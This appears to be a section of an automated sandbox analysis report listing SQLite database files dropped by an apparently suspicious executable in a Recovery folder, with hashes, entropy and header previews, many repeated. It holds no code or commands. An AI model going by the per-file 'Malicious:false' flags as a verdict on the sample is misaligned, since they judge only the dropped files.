                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):0.08235737944063153
                                                    Encrypted:false
                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
